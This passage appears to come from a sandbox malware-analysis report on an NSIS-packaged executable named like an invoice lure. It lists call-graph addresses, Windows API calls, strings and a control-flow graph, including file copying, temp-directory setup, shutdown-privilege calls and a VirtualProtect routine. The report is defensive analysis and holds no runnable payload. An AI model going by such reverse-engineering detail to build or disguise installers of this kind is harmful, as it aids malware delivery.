4315->4317 4318 4036dc ExitProcess 4315->4318 4316 40353c 4492 4056bc 4316->4492 4323 4036ad 4317->4323 4324 40367d LookupPrivilegeValueA AdjustTokenPrivileges 4317->4324 4457 405627 4320->4457 4469 405a26 4321->4469 4328 406338 5 API calls 4323->4328 4324->4323 4331 4036b4 4328->4331 4334 4036c9 ExitWindowsEx 4331->4334 4337 4036d5 4331->4337 4332 403573 lstrcatA lstrcmpiA 4332->4305 4336 40358f 4332->4336 4333 403568 lstrcatA 4333->4332 4334->4318 4334->4337 4339 403594 4336->4339 4340 40359b 4336->4340 4341 40140b 2 API calls 4337->4341 4338 403507 4484 405fa0 lstrcpynA 4338->4484 4496 40558d CreateDirectoryA 4339->4496 4501 40560a CreateDirectoryA 4340->4501 4341->4318 4346 4035a0 SetCurrentDirectoryA 4347 4035ba 4346->4347 4348 4035af 4346->4348 4460 405fa0 lstrcpynA 4347->4460 4504 405fa0 lstrcpynA 4348->4504 4351 405fc2 17 API calls 4352 4035f9 DeleteFileA 4351->4352 4353 403606 CopyFileA 4352->4353 4358 4035c8 4352->4358 4353->4358 4354 40364e 4355 405d7f 36 API calls 4354->4355 4355->4305 4357 405fc2 17 API calls 4357->4358 4358->4351 4358->4354 4358->4357 4360 40363a CloseHandle 4358->4360 4461 405d7f MoveFileExA 4358->4461 4465 40563f CreateProcessA 4358->4465 4360->4358 4361->4286 4362->4288 4364 40620a 5 API calls 4363->4364 4365 4031e7 4364->4365 4366 4031f1 4365->4366 4505 405938 lstrlenA CharPrevA 4365->4505 4366->4295 4369 40560a 2 API calls 4370 4031ff 4369->4370 4371 405b68 2 API calls 4370->4371 4372 40320a 4371->4372 4372->4295 4508 405b39 GetFileAttributesA CreateFileA 4373->4508 4375 402da3 4376 402db3 4375->4376 4509 405fa0 lstrcpynA 4375->4509 4376->4303 4378 402dc9 4510 40597f lstrlenA 4378->4510 4382 402dda GetFileSize 4383 402df1 4382->4383 4398 402ed6 4382->4398 4383->4376 4389 402f42 4383->4389 4397 402cff 6 API calls 4383->4397 4383->4398 4547 4031ae 4383->4547 4385 402edf 4385->4376 4387 402f0f GlobalAlloc 4385->4387 4550 4031c4 SetFilePointer 4385->4550 4526 4031c4 SetFilePointer 4387->4526 4393 402cff 6 API calls 4389->4393 4391 402ef8 4394 4031ae ReadFile 4391->4394 4392 402f2a 4527 402f9c 4392->4527 4393->4376 4396 402f03 4394->4396 4396->4376 4396->4387 4397->4383 4515 402cff 4398->4515 4399 402f36 4399->4376 4399->4399 4400 402f73 SetFilePointer 4399->4400 4400->4376 4402 406338 5 API calls 4401->4402 4403 4037e2 4402->4403 4404 4037e8 4403->4404 4405 4037fa 4403->4405 4566 405efe wsprintfA 4404->4566 4406 405e87 3 API calls 4405->4406 4407 403825 4406->4407 4408 403843 lstrcatA 4407->4408 4410 405e87 3 API calls 4407->4410 4411 4037f8 4408->4411 4410->4408 4558 403a93 4411->4558 4414 405a26 18 API calls 4415 403875 4414->4415 4416 4038fe 4415->4416 4418 405e87 3 API calls 4415->4418 4417 405a26 18 API calls 4416->4417 4419 403904 4417->4419 4420 4038a1 4418->4420 4421 403914 LoadImageA 4419->4421 4424 405fc2 17 API calls 4419->4424 4420->4416 4427 4038bd lstrlenA 4420->4427 4430 405963 CharNextA 4420->4430 4422 4039ba 4421->4422 4423 40393b RegisterClassA 4421->4423 4426 40140b 2 API calls 4422->4426 4425 403971 SystemParametersInfoA CreateWindowExA 4423->4425 4456 4039c4 4423->4456 4424->4421 4425->4422 4432 4039c0 4426->4432 4428 4038f1 4427->4428 4429 4038cb lstrcmpiA 4427->4429 4433 405938 3 API calls 4428->4433 4429->4428 4431 4038db GetFileAttributesA 4429->4431 4434 4038bb 4430->4434 4435 4038e7 4431->4435 4436 403a93 18 API calls 4432->4436 4432->4456 4437 4038f7 4433->4437 4434->4427 4435->4428 4438 40597f 2 API calls 4435->4438 4439 4039d1 4436->4439 4567 405fa0 lstrcpynA 4437->4567 4438->4428 4441 403a60 4439->4441 4442 4039dd ShowWindow 4439->4442 4443 405199 5 API calls 4441->4443 4444 4062ca 3 API calls 4442->4444 4445 403a66 4443->4445 4446 4039f5 4444->4446 4447 403a82 4445->4447 4448 403a6a 4445->4448 4449 403a03 GetClassInfoA 4446->4449 4451 4062ca 3 API calls 4446->4451 4450 40140b 2 API calls 4447->4450 4455 40140b 2 API calls 4448->4455 4448->4456 4452 403a17 GetClassInfoA RegisterClassA 4449->4452 4453 403a2d DialogBoxParamA 4449->4453 4450->4456 4451->4449 4452->4453 4454 40140b 2 API calls 4453->4454 4454->4456 4455->4456 4456->4305 4458 406338 5 API calls 4457->4458 4459 403557 lstrcatA 4458->4459 4459->4332 4459->4333 4460->4358 4462 405da0 4461->4462 4463 405d93 4461->4463 4462->4358 4569 405c0f 4463->4569 4466 405672 CloseHandle 4465->4466 4467 40567e 4465->4467 4466->4467 4467->4358 4468->4293 4603 405fa0 lstrcpynA 4469->4603 4471 405a37 4604 4059d1 CharNextA CharNextA 4471->4604 4474 4034f8 4474->4305 4483 405fa0 lstrcpynA 4474->4483 4475 40620a 5 API calls 4481 405a4d 4475->4481 4476 405a78 lstrlenA 4477 405a83 4476->4477 4476->4481 4479 405938 3 API calls 4477->4479 4480 405a88 GetFileAttributesA 4479->4480 4480->4474 4481->4474 4481->4476 4482 40597f 2 API calls 4481->4482 4610 4062a3 FindFirstFileA 4481->4610 4482->4476 4483->4338 4484->4308 4486 40370c 4485->4486 4487 4036fe CloseHandle 4485->4487 4613 403739 4486->4613 4487->4486 4493 4056d1 4492->4493 4494 40354a ExitProcess 4493->4494 4495 4056e5 MessageBoxIndirectA 4493->4495 4495->4494 4497 403599 4496->4497 4498 4055de GetLastError 4496->4498 4497->4346 4498->4497 4499 4055ed SetFileSecurityA 4498->4499 4499->4497 4500 405603 GetLastError 4499->4500 4500->4497 4502 40561e GetLastError 4501->4502 4503 40561a 4501->4503 4502->4503 4503->4346 4504->4347 4506 405952 lstrcatA 4505->4506 4507 4031f9 4505->4507 4506->4507 4507->4369 4508->4375 4509->4378 4511 40598c 4510->4511 4512 405991 CharPrevA 4511->4512 4513 402dcf 4511->4513 4512->4511 4512->4513 4514 405fa0 lstrcpynA 4513->4514 4514->4382 4516 402d20 4515->4516 4517 402d08 4515->4517 4518 402d30 GetTickCount 4516->4518 4519 402d28 4516->4519 4520 402d11 DestroyWindow 4517->4520 4521 402d18 4517->4521 4523 402d61 4518->4523 4524 402d3e CreateDialogParamA ShowWindow 4518->4524 4551 406374 4519->4551 4520->4521 4521->4385 4523->4385 4524->4523 4526->4392 4529 402fb2 4527->4529 4528 402fe0 4531 4031ae ReadFile 4528->4531 4529->4528 4557 4031c4 SetFilePointer 4529->4557 4532 402feb 4531->4532 4533 403147 4532->4533 4534 402ffd GetTickCount 4532->4534 4535 403131 4532->4535 4536 403189 4533->4536 4539 40314b 4533->4539 4534->4535 4543 40304c 4534->4543 4535->4399 4538 4031ae ReadFile 4536->4538 4537 4031ae ReadFile 4537->4543 4538->4535 4539->4535 4540 4031ae ReadFile 4539->4540 4541 405be0 WriteFile 4539->4541 4540->4539 4541->4539 4542 4030a2 GetTickCount 4542->4543 4543->4535 4543->4537 4543->4542 4544 4030c7 MulDiv wsprintfA 4543->4544 4555 405be0 WriteFile 4543->4555 4545 4050c7 24 API calls 4544->4545 4545->4543 4548 405bb1 ReadFile 4547->4548 4549 4031c1 4548->4549 4549->4383 4550->4391 4552 406391 PeekMessageA 4551->4552 4553 402d2e 4552->4553 4554 406387 DispatchMessageA 4552->4554 4553->4385 4554->4552 4556 405bfe 4555->4556 4556->4543 4557->4528 4559 403aa7 4558->4559 4568 405efe wsprintfA 4559->4568 4561 403b18 4562 403b4c 18 API calls 4561->4562 4564 403b1d 4562->4564 4563 403853 4563->4414 4564->4563 4565 405fc2 17 API calls 4564->4565 4565->4564 4566->4411 4567->4416 4568->4561 4570 405c35 4569->4570 4571 405c5b GetShortPathNameA 4569->4571 4596 405b39 GetFileAttributesA CreateFileA 4570->4596 4573 405c70 4571->4573 4574 405d7a 4571->4574 4573->4574 4575 405c78 wsprintfA 4573->4575 4574->4462 4577 405fc2 17 API calls 4575->4577 4576 405c3f CloseHandle GetShortPathNameA 4576->4574 4578 405c53 4576->4578 4579 405ca0 4577->4579 4578->4571 4578->4574 4597 405b39 GetFileAttributesA CreateFileA 4579->4597 4581 405cad 4581->4574 4582 405cbc GetFileSize GlobalAlloc 4581->4582 4583 405d73 CloseHandle 4582->4583 4584 405cde 4582->4584 4583->4574 4585 405bb1 ReadFile 4584->4585 4586 405ce6 4585->4586 4586->4583 4598 405a9e lstrlenA 4586->4598 4589 405d11 4591 405a9e 4 API calls 4589->4591 4590 405cfd lstrcpyA 4592 405d1f 4590->4592 4591->4592 4593 405d56 SetFilePointer 4592->4593 4594 405be0 WriteFile 4593->4594 4595 405d6c GlobalFree 4594->4595 4595->4583 4596->4576 4597->4581 4599 405adf lstrlenA 4598->4599 4600 405ae7 4599->4600 4601 405ab8 lstrcmpiA 4599->4601 4600->4589 4600->4590 4601->4600 4602 405ad6 CharNextA 4601->4602 4602->4599 4603->4471 4605 4059ec 4604->4605 4608 4059fc 4604->4608 4607 4059f7 CharNextA 4605->4607 4605->4608 4606 405a1c 4606->4474 4606->4475 4607->4606 4608->4606 4609 405963 CharNextA 4608->4609 4609->4608 4611 4062c4 4610->4611 4612 4062b9 FindClose 4610->4612 4611->4481 4612->4611 4614 403747 4613->4614 4615 403711 4614->4615 4616 40374c FreeLibrary GlobalFree 4614->4616 4617 405768 4615->4617 4616->4615 4616->4616 4618 405a26 18 API calls 4617->4618 4619 405788 4618->4619 4620 405790 DeleteFileA 4619->4620 4621 4057a7 4619->4621 4622 40352b OleUninitialize 4620->4622 4623 4058df 4621->4623 4658 405fa0 lstrcpynA 4621->4658 4622->4315 4622->4316 4623->4622 4628 4062a3 2 API calls 4623->4628 4625 4057cd 4626 4057e0 4625->4626 4627 4057d3 lstrcatA 4625->4627 4630 40597f 2 API calls 4626->4630 4629 4057e6 4627->4629 4633 4058f9 4628->4633 4631 4057f4 lstrcatA 4629->4631 4632 4057eb 4629->4632 4630->4629 4634 4057ff lstrlenA FindFirstFileA 4631->4634 4632->4631 4632->4634 4633->4622 4635 4058fd 4633->4635 4636 4058d5 4634->4636 4656 405823 4634->4656 4637 405938 3 API calls 4635->4637 4636->4623 4639 405903 4637->4639 4638 405963 CharNextA 4638->4656 4640 405720 5 API calls 4639->4640 4641 40590f 4640->4641 4642 405913 4641->4642 4643 405929 4641->4643 4642->4622 4648 4050c7 24 API calls 4642->4648 4644 4050c7 24 API calls 4643->4644 4644->4622 4645 4058b4 FindNextFileA 4647 4058cc FindClose 4645->4647 4645->4656 4647->4636 4649 405920 4648->4649 4650 405d7f 36 API calls 4649->4650 4653 405927 4650->4653 4652 405768 60 API calls 4652->4656 4653->4622 4654 4050c7 24 API calls 4654->4645 4655 4050c7 24 API calls 4655->4656 4656->4638 4656->4645 4656->4652 4656->4654 4656->4655 4657 405d7f 36 API calls 4656->4657 4659 405fa0 lstrcpynA 4656->4659 4660 405720 4656->4660 4657->4656 4658->4625 4659->4656 4668 405b14 GetFileAttributesA 4660->4668 4663 40574d 4663->4656 4664 405743 DeleteFileA 4666 405749 4664->4666 4665 40573b RemoveDirectoryA 4665->4666 4666->4663 4667 405759 SetFileAttributesA 4666->4667 4667->4663 4669 40572c 4668->4669 4670 405b26 SetFileAttributesA 4668->4670 4669->4663 4669->4664 4669->4665 4670->4669 5279 40378c 5280 403797 5279->5280 5281 40379e GlobalAlloc 5280->5281 5282 40379b 5280->5282 5281->5282 5283 401490 5284 4050c7 24 API calls 5283->5284 5285 401497 5284->5285 5286 401d9b GetDC 5287 402aa9 17 API calls 5286->5287 5288 401dad GetDeviceCaps MulDiv ReleaseDC 5287->5288 5289 402aa9 17 API calls 5288->5289 5290 401dde 5289->5290 5291 405fc2 17 API calls 5290->5291 5292 401e1b CreateFontIndirectA 5291->5292 5293 40257d 5292->5293 5294 40149d 5295 4014ab PostQuitMessage 5294->5295 5296 4022e7 5294->5296 5295->5296 5297 40159d 5298 402acb 17 API calls 5297->5298 5299 4015a4 SetFileAttributesA 5298->5299 5300 4015b6 5299->5300 5301 401a1e 5302 402acb 17 API calls 5301->5302 5303 401a27 ExpandEnvironmentStringsA 5302->5303 5304 401a3b 5303->5304 5306 401a4e 5303->5306 5305 401a40 lstrcmpA 5304->5305 5304->5306 5305->5306 5312 40171f 5313 402acb 17 API calls 5312->5313 5314 401726 SearchPathA 5313->5314 5315 401741 5314->5315 5316 401d20 5317 402aa9 17 API calls 5316->5317 5318 401d2e SetWindowLongA 5317->5318 5319 402957 5318->5319 5320 404822 5321 404832 5320->5321 5322 40484e 5320->5322 5331 4056a0 GetDlgItemTextA 5321->5331 5324 404881 5322->5324 5325 404854 SHGetPathFromIDListA 5322->5325 5327 40486b SendMessageA 5325->5327 5328 404864 5325->5328 5326 40483f SendMessageA 5326->5322 5327->5324 5329 40140b 2 API calls 5328->5329 5329->5327 5331->5326 5332 4041aa 5333 4041c0 5332->5333 5338 4042cc 5332->5338 5336 40403f 18 API calls 5333->5336 5334 40433b 5335 404405 5334->5335 5337 404345 GetDlgItem 5334->5337 5344 4040a6 8 API calls 5335->5344 5339 404216 5336->5339 5340 4043c3 5337->5340 5341 40435b 5337->5341 5338->5334 5338->5335 5342 404310 GetDlgItem SendMessageA 5338->5342 5343 40403f 18 API calls 5339->5343 5340->5335 5345 4043d5 5340->5345 5341->5340 5349 404381 SendMessageA LoadCursorA SetCursor 5341->5349 5365 404061 KiUserCallbackDispatcher 5342->5365 5347 404223 CheckDlgButton 5343->5347 5348 404400 5344->5348 5350 4043db SendMessageA 5345->5350 5351 4043ec 5345->5351 5363 404061 KiUserCallbackDispatcher 5347->5363 5366 40444e 5349->5366 5350->5351 5351->5348 5355 4043f2 SendMessageA 5351->5355 5352 404336 5356 40442a SendMessageA 5352->5356 5355->5348 5356->5334 5357 404241 GetDlgItem 5364 404074 SendMessageA 5357->5364 5360 404257 SendMessageA 5361 404275 GetSysColor 5360->5361 5362 40427e SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5360->5362 5361->5362 5362->5348 5363->5357 5364->5360 5365->5352 5369 405682 ShellExecuteExA 5366->5369 5368 4043b4 LoadCursorA SetCursor 5368->5340 5369->5368 4263 401e2b 4264 402aa9 17 API calls 4263->4264 4265 401e31 4264->4265 4266 402aa9 17 API calls 4265->4266 4267 401e3d 4266->4267 4268 401e54 EnableWindow 4267->4268 4269 401e49 ShowWindow 4267->4269 4270 402957 4268->4270 4269->4270 5370 4063ad WaitForSingleObject 5371 4063c7 5370->5371 5372 4063d9 GetExitCodeProcess 5371->5372 5373 406374 2 API calls 5371->5373 5374 4063ce WaitForSingleObject 5373->5374 5374->5371 5375 401f31 5376 402acb 17 API calls 5375->5376 5377 401f38 5376->5377 5378 4062a3 2 API calls 5377->5378 5379 401f3e 5378->5379 5380 401f50 5379->5380 5382 405efe wsprintfA 5379->5382 5382->5380 4700 6e1328e1 4701 6e132931 4700->4701 4702 6e1328f1 VirtualProtect 4700->4702 4702->4701 5383 402932 SendMessageA 5384 402957 5383->5384 5385 40294c InvalidateRect 5383->5385 5385->5384 5386 6e1310e0 5389 6e13110e 5386->5389 5387 6e1311c4 GlobalFree 5388 6e1312ad 2 API calls 5388->5389 5389->5387 5389->5388 5390 6e1311c3 5389->5390 5391 6e131266 2 API calls 5389->5391 5392 6e131155 GlobalAlloc 5389->5392 5393 6e1311ea GlobalFree 5389->5393 5394 6e1312d1 lstrcpyA 5389->5394 5395 6e1311b1 GlobalFree 5389->5395 5390->5387 5391->5395 5392->5389 5393->5389 5394->5389 5395->5389 5396 4014b7 5397 4014bd 5396->5397 5398 401389 2 API calls 5397->5398 5399 4014c5 5398->5399 5400 4026ba 5401 4026c0 5400->5401 5402 402957 5401->5402 5403 4026c8 FindClose 5401->5403 5403->5402 4787 4015bb 4788 402acb 17 API calls 4787->4788 4789 4015c2 4788->4789 4790 4059d1 4 API calls 4789->4790 4800 4015ca 4790->4800 4791 401624 4793 401652 4791->4793 4794 401629 4791->4794 4792 405963 CharNextA 4792->4800 4796 401423 24 API calls 4793->4796 4795 401423 24 API calls 4794->4795 4797 401630 4795->4797 4804 40164a 4796->4804 4806 405fa0 lstrcpynA 4797->4806 4798 40560a 2 API calls 4798->4800 4800->4791 4800->4792 4800->4798 4801 405627 5 API calls 4800->4801 4803 40160c GetFileAttributesA 4800->4803 4805 40558d 4 API calls 4800->4805 4801->4800 4802 40163b SetCurrentDirectoryA 4802->4804 4803->4800 4805->4800 4806->4802 5404 40503b 5405 40504b 5404->5405 5406 40505f 5404->5406 5407 405051 5405->5407 5416 4050a8 5405->5416 5408 405067 IsWindowVisible 5406->5408 5412 40507e 5406->5412 5410 40408b SendMessageA 5407->5410 5411 405074 5408->5411 5408->5416 5409 4050ad CallWindowProcA 5413 40505b 5409->5413 5410->5413 5414 404992 5 API calls 5411->5414 5412->5409 5415 404a12 4 API calls 5412->5415 5414->5412 5415->5416 5416->5409 5417 4016bb 5418 402acb 17 API calls 5417->5418 5419 4016c1 GetFullPathNameA 5418->5419 5421 4016d8 5419->5421 5426 4016f9 5419->5426 5420 40170d GetShortPathNameA 5422 402957 5420->5422 5423 4062a3 2 API calls 5421->5423 5421->5426 5424 4016e9 5423->5424 5424->5426 5427 405fa0 lstrcpynA 5424->5427 5426->5420 5426->5422 5427->5426 5428 40273c 5429 402acb 17 API calls 5428->5429 5430 40274a 5429->5430 5431 402760 5430->5431 5432 402acb 17 API calls 5430->5432 5433 405b14 2 API calls 5431->5433 5432->5431 5434 402766 5433->5434 5456 405b39 GetFileAttributesA CreateFileA 5434->5456 5436 402773 5437 40281c 5436->5437 5438 40277f GlobalAlloc 5436->5438 5441 402824 DeleteFileA 5437->5441 5442 402837 5437->5442 5439 402813 CloseHandle 5438->5439 5440 402798 5438->5440 5439->5437 5457 4031c4 SetFilePointer 5440->5457 5441->5442 5444 40279e 5445 4031ae ReadFile 5444->5445 5446 4027a7 GlobalAlloc 5445->5446 5447 4027f1 5446->5447 5448 4027b7 5446->5448 5449 405be0 WriteFile 5447->5449 5450 402f9c 31 API calls 5448->5450 5451 4027fd GlobalFree 5449->5451 5455 4027c4 5450->5455 5452 402f9c 31 API calls 5451->5452 5454 402810 5452->5454 5453 4027e8 GlobalFree 5453->5447 5454->5439 5455->5453 5456->5436 5457->5444 5458 401b3f 5459 402acb 17 API calls 5458->5459 5460 401b46 5459->5460 5461 402aa9 17 API calls 5460->5461 5462 401b4f wsprintfA 5461->5462 5463 402957 5462->5463

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 40320c-40324b SetErrorMode GetVersion 1 40324d-403255 call 406338 0->1 2 40325e 0->2 1->2 8 403257 1->8 4 403263-403276 call 4062ca lstrlenA 2->4 9 403278-403294 call 406338 * 3 4->9 8->2 16 4032a5-403303 #17 OleInitialize SHGetFileInfoA call 405fa0 GetCommandLineA call 405fa0 9->16 17 403296-40329c 9->17 24 403305-40330a 16->24 25 40330f-403324 call 405963 CharNextA 16->25 17->16 22 40329e 17->22 22->16 24->25 28 4033e9-4033ed 25->28 29 4033f3 28->29 30 403329-40332c 28->30 33 403406-403420 GetTempPathA call 4031db 29->33 31 403334-40333c 30->31 32 40332e-403332 30->32 34 403344-403347 31->34 35 40333e-40333f 31->35 32->31 32->32 43 403422-403440 GetWindowsDirectoryA lstrcatA call 4031db 33->43 44 403478-403492 DeleteFileA call 402d63 33->44 37 4033d9-4033e6 call 405963 34->37 38 40334d-403351 34->38 35->34 37->28 56 4033e8 37->56 41 403353-403359 38->41 42 403369-403396 38->42 50 40335b-40335d 41->50 51 40335f 41->51 45 403398-40339e 42->45 46 4033a9-4033d7 42->46 43->44 58 403442-403472 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031db 43->58 59 403526-403536 call 4036f4 OleUninitialize 44->59 60 403498-40349e 44->60 52 4033a0-4033a2 45->52 53 4033a4 45->53 46->37 55 4033f5-403401 call 405fa0 46->55 50->42 50->51 51->42 52->46 52->53 53->46 55->33 56->28 58->44 58->59 72 40365a-403660 59->72 73 40353c-40354c call 4056bc ExitProcess 59->73 63 4034a0-4034ab call 405963 60->63 64 403516-40351d call 4037ce 60->64 76 4034e1-4034eb 63->76 77 4034ad-4034d6 63->77 70 403522 64->70 70->59 74 403662-40367b GetCurrentProcess OpenProcessToken 72->74 75 4036dc-4036e4 72->75 82 4036ad-4036bb call 406338 74->82 83 40367d-4036a7 LookupPrivilegeValueA AdjustTokenPrivileges 74->83 85 4036e6 75->85 86 4036ea-4036ee ExitProcess 75->86 79 403552-403566 call 405627 lstrcatA 76->79 80 4034ed-4034fa call 405a26 76->80 84 4034d8-4034da 77->84 95 403573-40358d lstrcatA lstrcmpiA 79->95 96 403568-40356e lstrcatA 79->96 80->59 94 4034fc-403512 call 405fa0 * 2 80->94 97 4036c9-4036d3 ExitWindowsEx 82->97 98 4036bd-4036c7 82->98 83->82 84->76 90 4034dc-4034df 84->90 85->86 90->76 90->84 94->64 95->59 100 40358f-403592 95->100 96->95 97->75 101 4036d5-4036d7 call 40140b 97->101 98->97 98->101 103 403594-403599 call 40558d 100->103 104 40359b call 40560a 100->104 101->75 112 4035a0-4035ad SetCurrentDirectoryA 103->112 104->112 113 4035ba-4035e2 call 405fa0 112->113 114 4035af-4035b5 call 405fa0 112->114 118 4035e8-403604 call 405fc2 DeleteFileA 113->118 114->113 121 403645-40364c 118->121 122 403606-403616 CopyFileA 118->122 121->118 124 40364e-403655 call 405d7f 121->124 122->121 123 403618-403631 call 405d7f call 405fc2 call 40563f 122->123 132 403636-403638 123->132 124->59 132->121 133 40363a-403641 CloseHandle 132->133 133->121
                              APIs
                              • SetErrorMode.KERNELBASE ref: 00403231
                              • GetVersion.KERNEL32 ref: 00403237
                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040326A
                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032A6
                              • OleInitialize.OLE32(00000000), ref: 004032AD
                              • SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032C9
                              • GetCommandLineA.KERNEL32(Meo Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032DE
                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe",00000020,"C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe",00000000,?,00000006,00000008,0000000A), ref: 0040331A
                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403417
                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403428
                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403434
                              • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403448
                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403450
                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403461
                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403469
                              • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040347D
                                • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                • Part of subcall function 004037CE: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort,1033,Meo Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Meo Setup: Installing,00000000,00000002,76193410), ref: 004038BE
                                • Part of subcall function 004037CE: lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                                • Part of subcall function 004037CE: GetFileAttributesA.KERNEL32(Call), ref: 004038DC
                                • Part of subcall function 004037CE: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort), ref: 00403925
                                • Part of subcall function 004037CE: RegisterClassA.USER32(0042EBA0), ref: 00403962
                                • Part of subcall function 004036F4: CloseHandle.KERNEL32(000002DC,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF
                              • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040352B
                              • ExitProcess.KERNEL32 ref: 0040354C
                              • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403669
                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403670
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403688
                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A7
                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004036CB
                              • ExitProcess.KERNEL32 ref: 004036EE
                                • Part of subcall function 004056BC: MessageBoxIndirectA.USER32(0040A218), ref: 00405717
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                              • String ID: "$"C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Spore$C:\Users\user\Desktop$C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe$Error launching installer$Low$Meo Setup$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                              • API String ID: 3776617018-1646543712
                              • Opcode ID: 9161ca9a5d85e359970b7cee058ae04b75de6ebf09e6b580f2889a559d4e6eb6
                              • Instruction ID: 947ab88924f8c3b38e2aea5cfaab7316d1dfac26a51a196f62222c0ed64aafcd
                              • Opcode Fuzzy Hash: 9161ca9a5d85e359970b7cee058ae04b75de6ebf09e6b580f2889a559d4e6eb6
                              • Instruction Fuzzy Hash: EEC1D470604741AAD7216F759E89B2F3EACAF45706F44053FF581B61E2CB7C8A058B2E

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 134 405205-405221 135 4053b0-4053b6 134->135 136 405227-4052ee GetDlgItem * 3 call 404074 call 404965 GetClientRect GetSystemMetrics SendMessageA * 2 134->136 138 4053e0-4053ec 135->138 139 4053b8-4053da GetDlgItem CreateThread FindCloseChangeNotification 135->139 156 4052f0-40530a SendMessageA * 2 136->156 157 40530c-40530f 136->157 141 40540e-405414 138->141 142 4053ee-4053f4 138->142 139->138 146 405416-40541c 141->146 147 405469-40546c 141->147 144 4053f6-405409 ShowWindow * 2 call 404074 142->144 145 40542f-405436 call 4040a6 142->145 144->141 160 40543b-40543f 145->160 151 405442-405452 ShowWindow 146->151 152 40541e-40542a call 404018 146->152 147->145 149 40546e-405474 147->149 149->145 158 405476-405489 SendMessageA 149->158 154 405462-405464 call 404018 151->154 155 405454-40545d call 4050c7 151->155 152->145 154->147 155->154 156->157 163 405311-40531d SendMessageA 157->163 164 40531f-405336 call 40403f 157->164 165 405586-405588 158->165 166 40548f-4054bb CreatePopupMenu call 405fc2 AppendMenuA 158->166 163->164 173 405338-40534c ShowWindow 164->173 174 40536c-40538d GetDlgItem SendMessageA 164->174 165->160 171 4054d0-4054e6 TrackPopupMenu 166->171 172 4054bd-4054cd GetWindowRect 166->172 171->165 176 4054ec-405506 171->176 172->171 177 40535b 173->177 178 40534e-405359 ShowWindow 173->178 174->165 175 405393-4053ab SendMessageA * 2 174->175 